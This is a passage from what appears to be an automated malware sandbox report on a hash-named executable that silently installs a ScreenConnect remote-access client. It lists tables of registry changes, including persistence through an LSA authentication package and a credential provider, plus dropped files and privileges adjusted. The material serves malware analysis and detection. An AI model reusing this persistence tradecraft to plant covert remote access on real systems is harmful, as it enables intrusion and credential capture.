| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
Boot or Logon Autostart Execution: Authentication Package
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800320030006100650031003000310063006500660030006600310061006300660029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Installer\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f7829a0.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f7829a1.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f7829a1.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{27FF5BC2-C647-2B99-83BE-DDEA87E94140}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev1 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\f7829a0.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2EDE.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI33B1.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev3 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2D76.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f7829a3.msi | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\PackageCode = "2CB5FF72746C99B238EBDDAE789E1404" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\URL Protocol | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CB5FF72746C99B238EBDDAE789E1404\Full | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F} | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\ = "ScreenConnect Client (20ae101cef0f1acf) Credential Provider" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-20ae101cef0f1acf | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-20ae101cef0f1acf\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\B13434442C21EB3002EA01C1FEF0A1FC\2CB5FF72746C99B238EBDDAE789E1404 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\20ae101cef0f1acf\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\UseOriginalUrlEncoding = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.WindowsClient.exe\" \"%1\"" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.WindowsCredentialProvider.dll" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\ProductName = "ScreenConnect Client (20ae101cef0f1acf)" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\B13434442C21EB3002EA01C1FEF0A1FC | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\20ae101cef0f1acf\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\ProductIcon = "C:\\Windows\\Installer\\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\\DefaultIcon" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CB5FF72746C99B238EBDDAE789E1404 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\PackageName = "setup.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Version = "402718729" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
